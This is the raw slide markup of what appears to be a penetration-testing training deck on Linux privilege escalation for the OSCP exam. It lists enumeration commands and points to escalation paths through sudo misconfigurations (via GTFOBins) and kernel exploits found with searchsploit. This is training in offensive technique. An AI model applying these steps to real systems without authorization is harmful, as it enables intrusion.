              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09EB9F55-973F-4CF2-B67D-BB12779BAD8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3394518" y="2991083"/>
            <a:ext cx="1604865" cy="226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421212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13621-8CA7-4C78-B357-EB7D765AE7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3DDF236-D2FE-4420-8BBD-815340CB8D3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Who Am I? (Continued)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEE021B5-D1FB-455D-A4F4-496AD4C4EF12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="11363325" cy="929640"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Primary </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PrivEsc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Path: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Gather permissions and use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>GTFOBins</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A859E984-523B-4BDD-9AA1-15DE41E120AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="342909" y="2452309"/>
            <a:ext cx="4635492" cy="1479290"/>
            <a:chOff x="861069" y="2566003"/>
            <a:chExt cx="4635492" cy="1479290"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Picture 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62044348-3887-4D01-A11B-0A5759C50D0E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2"/>
            <a:srcRect r="39555"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="861069" y="2566003"/>
              <a:ext cx="4635492" cy="1479290"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Rectangle 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76140DBF-D326-421C-89B6-0CC0DD0A64DD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1268617" y="3683939"/>
              <a:ext cx="2532606" cy="1790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10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4532971C-03A9-4A81-857E-CAB34BA4E1CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="342909" y="4187522"/>
            <a:ext cx="5667375" cy="1724025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A10455B0-139C-48C3-838A-CB2491742C8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2119786" y="4365327"/>
            <a:ext cx="19607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Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>GTFOBins</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2800" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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7912F4B1-7162-472B-BB11-56A17B5CB856}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4241461" y="4056407"/>
            <a:ext cx="2733675" cy="1247775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Arrow: Right 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BD4A08C-8BBD-4AE6-BC7B-929DC77843AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6255362" y="3220077"/>
            <a:ext cx="711200" cy="762321"/>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E14F47C9-DE48-4DE7-AD71-EB9ACB5A9B5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7360276" y="3034319"/>
            <a:ext cx="4591050" cy="2505075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rectangle 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92EBB283-346B-4FF4-AFB7-DA6A71703ACC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7344393" y="3806788"/>
            <a:ext cx="1341810" cy="249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A471A3A5-E893-4B98-9AAE-154A562DE90F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9081753" y="3003774"/>
            <a:ext cx="2767338"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860300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31FA8-5280-4A40-B8B8-34608778C0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C889E7-3B63-4AFC-951C-C0FAD8A6CFB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Where Am I?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{207496B7-0811-4718-8B6A-0F70C56DF433}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="11594782" cy="1285240"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For OSCP: Look for outdated OS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For other situations: where am I in the network?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="31" name="Group 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B604BD8-C531-4EA9-80E5-88AFE1C7636B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="414337" y="2422992"/>
            <a:ext cx="9705630" cy="1355243"/>
            <a:chOff x="434050" y="2783706"/>
            <a:chExt cx="9705630" cy="1355243"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="TextBox 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{148ABB05-CB4B-48F4-8BA3-2F359D77188A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="434050" y="2783706"/>
              <a:ext cx="6096000" cy="1355243"/>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Common Commands:</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cat /</a:t>
              </a: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etc</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/issue</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cat /</a:t>
              </a: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etc</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/*-release</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="TextBox 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29CD455A-0B08-4637-BA51-7944A212B80E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4511040" y="3244345"/>
              <a:ext cx="2895600" cy="894604"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>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uname</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lscpu</a:t>
              </a:r>
              <a:endPar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p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="TextBox 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{161655E4-ED93-4FAC-9E30-2E642149DD66}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7244080" y="3292840"/>
              <a:ext cx="2895600" cy="433965"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>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printenv</a:t>
              </a:r>
              <a:endPar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p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="Picture 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24ED9FE7-EFCE-45A6-BA46-1CE7708709A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="791247" y="4078500"/>
            <a:ext cx="10840963" cy="1181265"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8115B1C1-DB42-4249-9684-33C918EE19A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414337" y="3769276"/>
            <a:ext cx="11594782" cy="1285240"/>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42681616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60A51-F9E2-4F46-BBA4-930849461A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4CF8FB6-DDAF-4517-BC19-AC832D683E80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Where Am I? (Continued)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB25DF8D-36EF-4141-A9BD-39B9A71197DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="434050" y="1268273"/>
            <a:ext cx="4925112" cy="4829849"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE710157-04DF-47FB-8E13-366F943EB696}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect r="12477"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5507205" y="1787457"/>
            <a:ext cx="6603516" cy="3791479"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24373374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CB077-4ED6-4416-AA67-C7085A4CC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4F90446-7D5B-47C6-9EA5-BA1BB2EE6EE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Where Am I? (Continued)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FF1C8BA-17D3-4B11-BA36-0B27677D48DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Primary </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PrivEsc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Path: Kernel Exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>searchsploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> | Google | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-exploit-suggester</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0398151-1021-4B8D-930F-8E8F3686D90B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="28666"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2062628" y="4390020"/>
            <a:ext cx="8087212" cy="1685448"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3D84975-E5AA-45F2-A9AD-85413C9801A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1561284" y="2548816"/>
            <a:ext cx="9089900" cy="1760368"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCC0793A-82E3-4DD8-A9C3-867ACC02B9B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1561284" y="3078480"/>
            <a:ext cx="2990396" cy="264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6A5C3175-D8DA-4541-BB83-E7033E83051D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3056482" y="3683000"/>
            <a:ext cx="1952398" cy="4784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3881638-1EB0-4F37-A10C-DEFEC0FE8349}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2042160" y="5836258"/>
            <a:ext cx="2722880" cy="320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112065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2725DC-2814-4185-B420-28D72F1E3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9900CD0-5654-4CDE-B81A-AF3D4DF585AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kernel Exploits – A Note</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB4550CC-05C0-4F4A-8514-932A9672FFA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kernel exploits can destabilize a system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Should avoid in the real world</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Should save for last in OSCP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May require cross compilation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tool: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This can be a frustrating experience	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Google and error codes are your friend</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3725681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DFA9E-15CB-450B-8BDC-090C32CEA2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CC6299B-97A0-424F-9D1A-548127DCBE88}"/>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A1A96911-9FB7-4EF9-9B7B-49C1B21EF5E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414339" y="1295400"/>
            <a:ext cx="5803582" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Find processes and scheduled jobs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Learn to spot the abnormal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Common Commands:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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aux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
